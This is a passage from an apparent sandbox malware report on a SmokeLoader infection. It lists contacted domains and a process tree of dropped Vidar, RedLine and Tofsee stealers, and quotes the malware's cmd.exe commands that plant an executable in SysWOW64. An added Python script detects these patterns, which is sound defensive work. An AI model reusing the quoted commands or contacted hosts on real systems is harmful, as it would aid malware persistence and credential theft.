• wsvmrr.com
• jqpeh.com
                                                                                                            • oaaiijnxpe.org
                                                                                                            • jaevdkvwx.net
                                                                                                            • jqjxcwg.net
                                                                                                            • 81.163.30.181
                                                                                                            • rllyqcpmf.net
                                                                                                            • yftnkjjlq.org
                                                                                                            • ufufplcjp.net
                                                                                                            • kbvly.com
                                                                                                            • lhythml.org
                                                                                                            • xfgpe.org
                                                                                                            • dleeejmcen.net
                                                                                                            • owkrx.com
                                                                                                            • tqglpd.org
                                                                                                            • vednhhpcxu.org
                                                                                                            • asmhpljw.com
                                                                                                            • kakoewy.org
                                                                                                            • ukwfgyyso.com
                                                                                                            • yqamoj.com
                                                                                                            • fqxsvrlwpv.net
                                                                                                            • bjxsvd.com

                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            Behavior

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Start time:13:58:09
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\Desktop\9ro85QVN0F.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\9ro85QVN0F.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:13:58:11
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\Desktop\9ro85QVN0F.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\9ro85QVN0F.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:13:58:12
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:12
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:13
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:13
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:14
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:14
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                            Imagebase:0x7ff793b50000
                                                                                                            File size:163336 bytes
                                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:15
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:18
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                            Imagebase:0x7ff720ea0000
                                                                                                            File size:3933184 bytes
                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:24
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:13:58:39
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:13:58:53
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                            General

                                                                                                            Start time:13:58:55
                                                                                                            Start date:14/01/2022
Path: C:\Users\user\AppData\Roaming\iscgwer
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\iscgwer
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: 4E806C42B23B043FA7409D108EECAADB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.395898272.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.395779805.0000000000460000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:58:56
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:59:00
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\411E.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\411E.exe
Imagebase: 0x400000
File size: 301056 bytes
MD5 hash: 277680BD3182EB0940BC356FF4712BEF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 46%, Metadefender
• Detection: 77%, ReversingLabs

General

Start time: 13:59:04
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\53DC.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\53DC.exe
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: 4E806C42B23B043FA7409D108EECAADB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 47%, ReversingLabs

General

Start time: 13:59:07
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\53DC.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\53DC.exe
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: 4E806C42B23B043FA7409D108EECAADB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.420944310.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.420623827.0000000000430000.00000004.00000001.sdmp, Author: Joe Security

General

Start time: 13:59:07
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520
Imagebase: 0x150000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 13:59:08
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\E6C4.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\E6C4.exe
Imagebase: 0x400000
File size: 322560 bytes
MD5 hash: C94FBEF580C7CD0BA874360D0B997F22
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

General

Start time: 13:59:11
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\F4CF.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\F4CF.exe
Imagebase: 0x400000
File size: 319488 bytes
MD5 hash: 50BADD524B2E3FAF0FF050DD5BE8A584
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000003.413183404.0000000000780000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.458185502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

General

Start time: 13:59:14
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\FD6B.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\FD6B.exe
Imagebase: 0xcf0000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML

General

Start time: 13:59:16
Start date: 14/01/2022
Path: C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase: 0x7ff6b8fe0000
File size: 455656 bytes
MD5 hash: A267555174BFA53844371226F482B86B
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 13:59:16
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:59:17
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 13:59:18
Start date: 14/01/2022
Path: C:\Windows\System32\wuapihost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\wuapihost.exe -Embedding
Imagebase: 0x7ff7d3830000
File size: 10752 bytes
MD5 hash: 85C9C161B102A164EC09A23CACDDD09E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 13:59:24
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
Imagebase: 0xd80000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:59:24
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:59:27
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
Imagebase: 0xd80000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 13:59:28
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\FD6B.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\FD6B.exe
Imagebase: 0x1a0000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 13:59:28
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7f20f0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

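The process records above are raw data; the value for an analyst is in the patterns that repeat across them: the same MD5 (4E806C42B23B043FA7409D108EECAADB) launched both from %TEMP%\53DC.exe and from %APPDATA%\iscgwer, a pair of cmd.exe invocations that create C:\Windows\SysWOW64\jdijwvkg\ and move a freshly dropped bzxmernq.exe into it, and the four-hex-digit file names of the executables dropped into %TEMP%. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling: it parses records in the report's own "Key:Value" layout (a subset of the records above, re-typed as constructed input) and applies those three heuristics. The regexes, verb list and system-directory list are the editor's assumptions and would need tuning before use on real endpoint telemetry.

```python
"""Heuristics over Joe Sandbox-style process records (added example, not report code)."""
import re
from collections import defaultdict

# Constructed input: a subset of the process records from the listing above,
# re-typed in the report's "Key:Value" layout so the script runs offline.
SAMPLE = r"""
General

Path:C:\Users\user\AppData\Roaming\iscgwer
Commandline:C:\Users\user\AppData\Roaming\iscgwer
MD5 hash:4E806C42B23B043FA7409D108EECAADB

General

Path:C:\Users\user\AppData\Local\Temp\53DC.exe
Commandline:C:\Users\user\AppData\Local\Temp\53DC.exe
MD5 hash:4E806C42B23B043FA7409D108EECAADB

General

Path:C:\Users\user\AppData\Local\Temp\53DC.exe
Commandline:C:\Users\user\AppData\Local\Temp\53DC.exe
MD5 hash:4E806C42B23B043FA7409D108EECAADB

General

Path:C:\Windows\SysWOW64\cmd.exe
Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D

General

Path:C:\Windows\SysWOW64\cmd.exe
Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
"""

# Assumed lists; extend for System32 subfolders, ProgramData, etc. as needed.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WRITE_VERB = re.compile(r"\b(mkdir|md|move|copy|xcopy)\b", re.IGNORECASE)
TEMP_HEX_EXE = re.compile(r"\\Temp\\[0-9A-F]{4}\.exe$", re.IGNORECASE)


def parse_blocks(text):
    """Split the listing at each 'General' heading into {key: value} records."""
    blocks, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            if cur:
                blocks.append(cur)
            cur = {}
        elif ":" in line:
            # Split on the first colon only, so times and drive letters keep theirs.
            key, value = line.split(":", 1)
            cur[key.strip()] = value.strip()
    if cur:
        blocks.append(cur)
    return blocks


def find_hash_reuse(blocks):
    """One MD5 launched from several paths: the binary was copied to a persistence location."""
    paths = defaultdict(set)
    for b in blocks:
        if "MD5 hash" in b and "Path" in b:
            paths[b["MD5 hash"].upper()].add(b["Path"])
    return {h: sorted(p) for h, p in paths.items() if len(p) > 1}


def find_system_dir_writes(blocks):
    """cmd.exe creating or moving files under System32/SysWOW64 (service-style install)."""
    hits = []
    for b in blocks:
        cmd = b.get("Commandline", "")
        if "cmd.exe" not in cmd.lower():
            continue
        m = WRITE_VERB.search(cmd)
        # Inspect only the arguments after the verb, so the cmd.exe path itself
        # (which also lives under SysWOW64) does not trigger the rule.
        if m and any(d in cmd[m.end():].lower() for d in SYSTEM_DIRS):
            hits.append(cmd)
    return hits


def find_temp_hex_drops(blocks):
    """Executables in %TEMP% named with four hex digits (411E.exe, 53DC.exe, ...)."""
    return sorted({b["Path"] for b in blocks if TEMP_HEX_EXE.search(b.get("Path", ""))})


def analyze(text):
    """Run every heuristic over a listing and return findings keyed by rule name."""
    blocks = parse_blocks(text)
    return {
        "hash_reuse": find_hash_reuse(blocks),
        "system_dir_writes": find_system_dir_writes(blocks),
        "temp_hex_drops": find_temp_hex_drops(blocks),
    }


if __name__ == "__main__":
    for rule, findings in analyze(SAMPLE).items():
        print(rule, findings)
```

The rules are deliberately narrow: hash reuse across paths needs the MD5 column, which endpoint logs usually carry as a process hash; the system-directory rule keys on the verb's arguments rather than the whole command line, otherwise every cmd.exe started from SysWOW64 would match.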
                                                                                                            Disassembly

                                                                                                            Code Analysis
